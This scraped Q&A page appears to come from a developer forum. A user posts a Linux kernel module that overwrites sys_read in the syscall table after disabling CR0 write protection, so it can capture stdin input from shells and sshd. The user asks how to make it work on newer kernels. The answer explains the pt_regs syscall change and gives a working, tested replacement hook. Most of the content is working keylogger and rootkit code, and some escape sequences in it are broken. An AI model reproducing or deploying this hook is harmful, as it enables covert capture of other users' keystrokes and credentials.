c - Memory Isolation in new Linux Kernels, or what?

Question

Welcome To Ask or Share your Answers For Others

c - Memory Isolation in new Linux Kernels, or what?

posted Oct 24, 2021 in Technique[技术] by 深蓝 (71.8m points)

c - Memory Isolation in new Linux Kernels, or what?

This my module perfectly hijacks user's console: https://pastebin.com/99YJFnaq

And it was Linux kernel 4.12, Kali 2018.1.

Now, I've installed the latest version of Kali - 2019.1. It uses kernel 4.19:

Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux

I'm trying to catch anything, but nothing with fd == 0 exists in flow.

I've googled for a long long time, tried to read changelogs on different resources...

I've found such module kpti, which probably would do something like that, but this module is not installed in Kali 2019.1.

Please, help me find the exact reason why hacked_read in this piece of code stopped hearing sys_read():

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>

#include <linux/time.h>
#include <linux/preempt.h>

#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>

#define BUFFER_SIZE 512

#define MODULE_NAME "hacked_read"

#define dbg( format, arg... )  do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... )  pr_err(  MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <[email protected]>" );

static char debug_buffer[ BUFFER_SIZE ];
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
void **sct;
unsigned long icounter = 0;

static inline void rw_enable( void ) {
    asm volatile ( "cli 
"
        "pushq %rax 
"
        "movq %cr0, %rax 
"
        "andq $0xfffffffffffeffff, %rax 
"
        "movq %rax, %cr0 
"
        "popq %rax " );
}

static inline uint64_t getcr0(void) {
    register uint64_t ret = 0;
    asm volatile (
        "movq %%cr0, %0
"
        :"=r"(ret)
    );
    return ret;
}

static inline void rw_disable( register uint64_t val ) {
    asm volatile(
        "movq %0, %%cr0
"
        "sti "
        :
        :"r"(val)
    );
}

static void* find_sym( const char *sym ) {
    static unsigned long faddr = 0; // static !!!
    // ----------- nested functions are a GCC extension ---------
    int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
        if( 0 == strcmp( (char*)data, sym ) ) {
            faddr = addr;
            return 1;
        } else return 0;
    };// --------------------------------------------------------
    kallsyms_on_each_symbol( symb_fn, (void*)sym );
    return (void*)faddr;
}

unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
    unsigned long r = 1;
    if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
        return original_read( fd, buf, count );
    } else {
        icounter++;
        if ( icounter % 1000 == 0 ) {
            info( "test2 icounter = %ld
", icounter );
            info( "strlen( debug_buffer ) = %ld
", strlen( debug_buffer ) );
        }
        r = original_read( fd, buf, count );
        strncat( debug_buffer, buf, 1 );
        if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
            debug_buffer[0] = '';
        return r;
    }
}

int hacked_read_init( void ) {
    register uint64_t cr0;
    info( "Module was loaded
" );
    sct = find_sym( "sys_call_table" );
    original_read = (void *)sct[ __NR_read ];
    cr0 = getcr0();
    rw_enable();
    sct[ __NR_read ] = hacked_read_test;
    rw_disable( cr0 );
    return 0;
}

void hacked_read_exit( void ) {
    register uint64_t cr0;
    info( "Module was unloaded
" );
    cr0 = getcr0();
    rw_enable();
    sct[ __NR_read ] = original_read;
    rw_disable( cr0 );
}

module_init( hacked_read_init );
module_exit( hacked_read_exit );

Makefile:

CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)

TARGET = hacked_read
obj-m := $(TARGET).o

default:
        $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
        @rm -f *.o .*.cmd .*.flags *.mod.c *.order
        @rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
        @rm -fR .tmp*
        @rm -rf .tmp_versions

I'm sure that everything like before keeps calling sys_read(). tee, bash, vi - all this stuff could not be changed in such short period, but linux-kernel.

I will appreciate the code with bypassing.

See Question&Answers more detail:os

与恶龙缠斗过久,自身亦成为恶龙；凝视深渊过久,深渊将回以凝视…

1 Reply

深蓝 · Answer 1 · 2021-10-23T17:56:04+0000

A bit of troubleshooting shows the following:

Of course, none of userspace programs stopped using read(). They still keep calling it.
There is no "memory isolation". The syscalls table is succesfully modified during the module initialization and the pointer to sys_read() is successfully replaced with pointer to hacked_read_test().
When the module is loaded, the read() syscall works as if it was the original one.
The change in the behavior happened between kernels 4.16 and 4.16.2 (i.e. between April 1, 2018 and April 12, 2018).

Considering this, we have pretty narrow list of commits to check, and the changes are likely to be in the syscalls mechanism. Well, looks like this commit is what we are looking for (and few more around).

The crucial part of this commit is that it changes signatures of the functions defined by SYSCALL_DEFINEx so that they accept a pointer to struct pt_regs instead of syscall arguments, i.e. sys_read(unsigned int fd, char __user * buf, size_t count) becomes sys_read(const struct pt_regs *regs). This means, that hacked_read_test(unsigned int fd, char *buf, size_t count) is no longer a valid replacement for sys_read()!

So, with new kernels you replace sys_read(const struct pt_regs *regs) with hacked_read_test(unsigned int fd, char *buf, size_t count). Why this does not crash and instead works as if it was the original sys_read()? Consider the simplified version of hacked_read_test() again:

unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
    if ( fd != 0 ) {
        return original_read( fd, buf, count );
    } else {
        // ...
    }
}

Well. The first function argument is passed via %rdi register. The caller of sys_read() places a pointer to struct pt_regs into %rdi and performs a call. The execution flow goes inside hacked_read_test(), and the first argument, fd, is checked for not being zero. Considering that this argument contains a valid pointer instead of file descriptor, this condition succeeds and the control flow goes directly to original_read(), which receives the fd value (i.e., actually, the pointer to struct pt_regs) as a first argument, which, in turn, then gets successfully used as it was originally meant to be. So, since kernel 4.16.2 your hacked_read_test() effectively works as follows:

unsigned long hacked_read_test( const struct pt_regs *regs ) {
    return original_read( regs );
}

To make sure about it, you can try the alternative version of hacked_read_test():

unsigned long hacked_read_test( void *ptr ) {    
    if ( ptr != 0 ) {
        info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
        return original_read( ptr );
    } else {
        return -EINVAL;
    }
}

After compiling and insmoding this version, you get the following:

invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)

You may create a working version of hacked_read_test(), but it seems that the implementation will be platform-dependent, as you will have to extract the arguments from the appropriate register fields of regs (for x86_84 these are %rdi, %rsi and %rdx for 1st, 2nd and 3rd syscall arguments respectively).

The working x86_64 implementation is below (tested on kernel 4.19).

#include <asm/ptrace.h>

// ...

unsigned long ( *original_read ) ( const struct pt_regs *regs );

// ...

unsigned long hacked_read_test( const struct pt_regs *regs ) {
    unsigned int fd = regs->di;
    char *buf = (char*) regs->si;
    unsigned long r = 1;
    if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
        return original_read( regs );
    } else {
        icounter++;
        if ( icounter % 1000 == 0 ) {
            info( "test2 icounter = %ld
", icounter );
            info( "strlen( debug_buffer ) = %ld
", strlen( debug_buffer ) );
        }
        r = original_read( regs );
        strncat( debug_buffer, buf, 1 );
        if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
            debug_buffer[0] = '';
        return r;
    }
}

Categories

c - Memory Isolation in new Linux Kernels, or what?

c - Memory Isolation in new Linux Kernels, or what?

Please log in or register to add a comment.

Please log in or register to reply this article.

1 Reply

Please log in or register to add a comment.

Just Browsing Browsing

Most popular tags